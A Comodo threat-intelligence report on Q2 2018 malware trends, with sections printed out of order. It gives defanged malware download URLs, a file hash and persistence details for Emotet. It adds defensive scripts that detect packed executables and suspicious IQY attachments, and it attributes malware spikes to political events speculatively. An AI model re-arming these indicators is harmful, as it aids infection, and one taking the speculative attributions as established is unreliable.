Version-3: Android Service PlacarTv Futebol Ao Vivo

The malware is covertly propagated via ... another cryptominer named CoinMiner.

How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Figure: Android-targeted malware in April

4.2.2 May 2018

Figure: Android-targeted malware in May


4.2.3 June 2018

Figure: Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms. A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor. Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers. Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
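A modified UPX build typically renames the stock UPX0/UPX1 sections, so a name match alone misses it; the layout (an empty first section reserved for the unpacked image, followed by a near-random compressed section) and per-section entropy still give it away. The following added example, not from the report and not Comodo's tooling, reads the PE section table directly and applies those checks. The two section layouts and the thresholds (0x1000 bytes, 7.0 bits/byte) are constructed assumptions for the demo.

```python
import hashlib
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for compressed or encrypted data, lower for code."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Minimal PE section-table reader; only the fields the heuristic needs."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        data = pe[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rsize,
            "entropy": shannon_entropy(data),
        })
    return sections


def packer_indicators(sections: list) -> list:
    """Heuristic hits for a UPX-style layout; an empty list means 'looks unpacked'."""
    hits = []
    for s in sections:
        if s["name"].upper().startswith("UPX"):
            hits.append(f"section {s['name']!r} carries a stock UPX name")
        # UPX reserves an empty first section where the unpacked image is rebuilt at run time
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            hits.append(f"section {s['name']!r} has no raw data but {s['virtual_size']:#x} bytes virtual")
        # the compressed payload itself is near-random, unlike ordinary machine code
        if s["raw_size"] >= 256 and s["entropy"] > 7.0:
            hits.append(f"section {s['name']!r} entropy {s['entropy']:.2f} looks compressed/encrypted")
    return hits


def build_pe(layout: list) -> bytes:
    """Constructed minimal PE for the demo: DOS header, PE signature, COFF header
    with no optional header, section table, then raw section data. Not loadable."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0, 0)
    raw_ptr = 0x40 + 4 + 20 + 40 * len(layout)
    table, body = b"", b""
    for name, vsize, data in layout:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000,
                             len(data), raw_ptr if data else 0, 0, 0, 0, 0, 0)
        body += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + table + body


def _pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy bytes standing in for a compressed payload (constructed)."""
    out, i = b"", 0
    while len(out) < n:
        out += hashlib.sha256(i.to_bytes(4, "little")).digest()
        i += 1
    return out[:n]


# Constructed layouts: a packed binary whose sections were renamed, and an ordinary one.
PACKED_LAYOUT = [(b"", 0x8000, b""), (b".data1", 0x3000, _pseudo_random(8192))]
CLEAN_LAYOUT = [(b".text", 0x2000, bytes(range(64)) * 64),
                (b".data", 0x1000, b"\0" * 1024 + b"Hello, world" * 8)]


def triage(pe: bytes) -> list:
    """Parse a PE image and return its packer indicator hits."""
    return packer_indicators(parse_sections(pe))


if __name__ == "__main__":
    for label, layout in (("packed", PACKED_LAYOUT), ("clean", CLEAN_LAYOUT)):
        print(label, triage(build_pe(layout)) or ["no packer indicators"])
```

Entropy alone also fires on legitimately compressed resources or installers, so treat the hits as a triage signal to prioritise unpacking and deeper analysis, not as a verdict.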

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder. Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes. "Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis. In this section let's examine the unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC.

Visit comodo.com

North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

Asia: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


The malware downloads itself to a temporary folder and executes binaries located at the following (defanged) URLs: hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r, hxxpairmaxxrswIdY.

At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service named "lanesviewer" to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission – stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers with popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as remote desktop control, a file system manager, proxy support, and audio chat. Cybercriminals take total control of the infected host and can run amok – steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is the fact that this trick is also based on using legitimate software – Microsoft's, this time.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell
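Because an IQY file is just a short text file whose third line is the URL Excel will fetch, a mail gateway or analyst can triage such attachments without opening Excel. The following Python checker is an added example and not code from the Comodo report or from any Comodo product: it parses the WEB / version / URL layout described above and flags queries whose host is not on an internal allowlist. The sample IQY text, the `example.invalid` hosts, and the `INTERNAL_HOSTS` allowlist are constructed for illustration.

```python
"""Triage IQY (Excel web query) attachments by the URL they would fetch.

Added example; the sample IQY content and the allowlist are constructed.
"""
from urllib.parse import urlparse

# Constructed sample in the real IQY layout: a "WEB" marker, a version
# line, the query URL, then optional key=value settings.
SAMPLE_IQY = """WEB
1
http://files.example.invalid/invoice.dat

Selection=EntirePage
Formatting=None
PreFormattedTextToColumns=True
"""

# Hypothetical allowlist of hosts an internal IQY is permitted to query.
INTERNAL_HOSTS = {"intranet.example.invalid"}


def parse_iqy(text):
    """Return (url, settings) from IQY text; raise ValueError if malformed."""
    lines = [ln.strip() for ln in text.splitlines()]
    if not lines or lines[0].upper() != "WEB":
        raise ValueError("not a WEB query")
    # After the marker: version number, then the URL, then settings.
    rest = [ln for ln in lines[1:] if ln]
    if len(rest) < 2:
        raise ValueError("missing query URL")
    url = rest[1]
    settings = {}
    for ln in rest[2:]:
        if "=" in ln:
            key, value = ln.split("=", 1)
            settings[key.strip()] = value.strip()
    return url, settings


def assess_iqy(text, allowed_hosts=INTERNAL_HOSTS):
    """Return a list of reasons to quarantine the attachment (empty if clean)."""
    reasons = []
    try:
        url, _settings = parse_iqy(text)
    except ValueError as exc:
        return [f"malformed: {exc}"]
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {parsed.scheme!r}")
    # The Flawed Ammyy lure points Excel at an attacker-controlled host;
    # anything outside the allowlist is treated as a fetch of foreign content.
    if parsed.hostname not in allowed_hosts:
        reasons.append(f"external host {parsed.hostname!r}")
    return reasons


if __name__ == "__main__":
    print(assess_iqy(SAMPLE_IQY))
```

The check is deliberately conservative: Excel will also prompt the user before running the query, but the report's point is that the payload chain (IQY, then PowerShell) rides on legitimate software, so blocking external-host IQY attachments at the gateway removes the first link without relying on the user's judgment.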


Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.

2.4 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

2.5 Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.

Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases, attacks can only be discovered too late: after money is withdrawn from a bank account, confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.

To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.

Flawed Ammyy detections by month, Q2 2018 (values from the chart in section 2.4):

Month   Detections
Apr     43,188
May     46,382
Jun     48,881


3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.

Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed.

New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers, and even crash user systems if met with an attempt to delete the malware.

3.1 BadShell attacks enterprises

